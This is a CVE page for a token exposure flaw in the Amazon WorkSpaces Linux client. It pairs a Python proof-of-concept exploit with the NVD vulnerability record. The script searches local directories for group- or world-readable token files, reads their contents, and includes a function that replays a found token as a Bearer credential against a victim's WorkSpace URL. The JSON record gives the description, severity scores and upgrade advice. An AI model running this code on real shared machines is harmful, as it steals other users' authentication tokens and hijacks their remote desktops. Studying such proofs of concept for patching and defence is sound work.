CVE-2025-12779

# CVE-2025-12779 PoC - Amazon WorkSpaces Linux Client Token Exposure # This PoC demonstrates the token exposure vulnerability in WorkSpaces client import os import glob import json def find_exposed_tokens(): """Search for improperly stored authentication tokens""" token_locations = [ '~/.local/share/amazon-workspaces/', '~/.config/amazon-workspaces/', '/tmp/amazon-workspaces/', '/var/tmp/amazon-workspaces/' ] exposed_tokens = [] for location in token_locations: expanded_path = os.path.expanduser(location) token_files = glob.glob(os.path.join(expanded_path, '**/*token*'), recursive=True) token_files.extend(glob.glob(os.path.join(expanded_path, '**/*.json'), recursive=True)) for token_file in token_files: # Check if file permissions allow world/group read access stat_info = os.stat(token_file) mode = stat_info.st_mode # If file is readable by group or others, it's potentially exposed if mode & 0o047: # Check group/other read bits with open(token_file, 'r') as f: try: content = f.read() if 'token' in content.lower() or 'auth' in content.lower(): exposed_tokens.append({ 'file': token_file, 'permissions': oct(mode), 'content_preview': content[:500] }) except: pass return exposed_tokens def exploit_token(token, target_workspace_url): """ Use exposed token to access victim's WorkSpace Note: This is for educational purposes only """ import requests headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } # Attempt to use the token response = requests.get(target_workspace_url, headers=headers) return response.status_code, response.text if __name__ == '__main__': print('[+] Searching for exposed WorkSpaces tokens...') tokens = find_exposed_tokens() if tokens: print(f'[+] Found {len(tokens)} potentially exposed token(s)') for token in tokens: print(f'[*] Token file: {token["file"]}') print(f'[*] Permissions: {token["permissions"]}') else: print('[-] No exposed tokens found')

{"cve": {"id": "CVE-2025-12779", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-11-05T22:15:33.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper handling of the authentication token in the Amazon WorkSpaces client for Linux, versions 2023.0 through 2024.8, may expose the authentication token for DCV-based WorkSpaces to other local users on the same client machine. Under certain circumstances, a local user may be able to extract another local user's authentication token from the shared client machine and access their WorkSpace.\n\nTo mitigate this issue, users should upgrade to the Amazon WorkSpaces client for Linux version 2025.0 or later."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-025/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://docs.aws.amazon.com/workspaces/latest/userguide/amazon-workspaces-linux-client.html#linux-release-notes", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}